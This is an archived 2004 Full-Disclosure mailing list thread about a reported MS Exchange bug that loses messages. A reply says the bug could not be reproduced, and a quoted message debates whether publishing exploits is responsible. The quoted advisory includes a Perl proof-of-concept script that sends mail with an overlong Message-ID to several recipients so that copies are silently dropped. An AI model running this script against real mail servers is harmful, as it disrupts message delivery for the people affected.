[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY7-DAV439ZfjIInTe0000d59d@hotmail.com>
From: rlanguy at hotmail.com (Lan Guy)
Subject: RE: Full-Disclosure MS Exchange message lost-so lets post how
I tried sending and email with a subjuct length of 255 chars (maxiumu) with
multiple recipients on three Exchange 2003 Servers none of which exhibited
the behaviour you described. All Messages to internal and external
recipients were recieved.
Lan Guy
----- Original Message -----
From: "RandallM" <randallm@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Thursday, May 13, 2004 4:45 AM
Subject: [Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so
lets post how
>I am using the following only as an example that has been slightly
>discussed
> here. The gentleman rightly posts and gives us the information that is
> very
> helpful to be aware of. But then posts the "exploit" example because, in
> his
> own words,
>
> <|>I think some people know how to use this "FEATURE" ... I hope this
> post
> <|>will speed up the fix release!
>
> Exactly in what way do you think this should speed up the release?
>
> Granted, this is a "lost" email exploit. But what if it was a dangerous
> exploit? I have seen these also posted.
>
> I know of "script Kiddies" who would never be able to find the exploit but
> are part of the group who "know how to use this 'FEATURE'...". They watch
> here and others just for that purpose. Where is accountability? I am torn
> between this issue of needed knowledge and exposed exploit. As a network
> Administrator I have no need for the exploit but for the knowledge. I have
> found no better place then here for that. Then on the other hand you all
> give out the exploits for confirmation which is needed also. Just some of
> my
> personal inward ramblings.
>
> thank you
> Randall M
>
>
> <|>--__--__--
> <|>
> <|>Message: 20
> <|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
> <|>From: I.D.S@....de
> <|>To: full-disclosure@...ts.netsys.com
> <|>Subject: [Full-Disclosure] MS Exchange message lost
> <|>
> <|>* MS Exchange duplicate message fault (message lost)
> <|>*
> <|>* MS Exchange (all versions affected) duplicate message fault
> <|>*
> <|>* I discovered this bug independently on 10, 2003
> <|>*
> <|>* public post 05, 2004
> <|>*
> <|>* Helmut Schmitz < i.d.s@....de >
> <|>*
> <|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */
> <|>
> <|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
> <|>Messages with long message ids (>189 bytes?)to more than one recipient
> <|>(cc),
> <|>the message will not delivered correctly ... there is no correct
> logging
> <|>!!,
> <|>the messages will be delivered to only one Recipient ... the message to
> <|>the
> <|>other will be lost !!
> <|>
> <|>I have send this issue to Microsoft (10.2003) ... some months later
> <|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81)
> with
> <|>some reg settings fixes (workaround ;-) the problem.
> <|>
> <|>Perl Example (test exploit) ...
> <|>
> <|>#!/usr/bin/perl -w
> <|>use Net::SMTP;
> <|>$from = 'sender@...rdomain.de';
> <|>$to = 'user1@...rdomain.de';
> <|>$cc = 'user2@...rdomain.de';
> <|>$subject = 'Test Email';
> <|>$smtp = Net::SMTP->new('yourmailserver');
> <|>$smtp->mail($from);
> <|>$smtp->to($to);
> <|>$smtp->cc($cc);
> <|>$smtp->data();
> <|>$smtp->datasend("To: <$to>\n");
> <|>$smtp->datasend("Cc: <$cc>\n");
> <|>$smtp->datasend("From: <$from>\n");
> <|>$smtp->datasend("Subject: $subject\n");
> <|>$smtp->datasend("Message-ID:
> <|><veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte
> <|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
> <|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
> <|>feejktmhedgedherngrondljzhng> \n");
> <|>$smtp->datasend("Hallo\n");
> <|>$smtp->datasend("123\n");
> <|>$smtp->datasend("123\n");
> <|>$smtp->datasend("123\n");
> <|>$smtp->dataend();
> <|>$smtp->quit;
> <|>
> <|>Background:
> <|>Duplicate detection is decided by three factors. These are MessageID,
> <|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
> <|>store. These are used to build a unique key when the message is
> <|>submitted.
> <|>If all the factors are the same value, then we recognize the message as
> <|>duplicate.
> <|>
> <|>###################################
> <|>
> <|>I think some people know how to use this "FEATURE" ... I hope this
> post
> <|>will speed up the fix release!
> <|>
> <|>Regards,
> <|>Helmut Schmitz
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists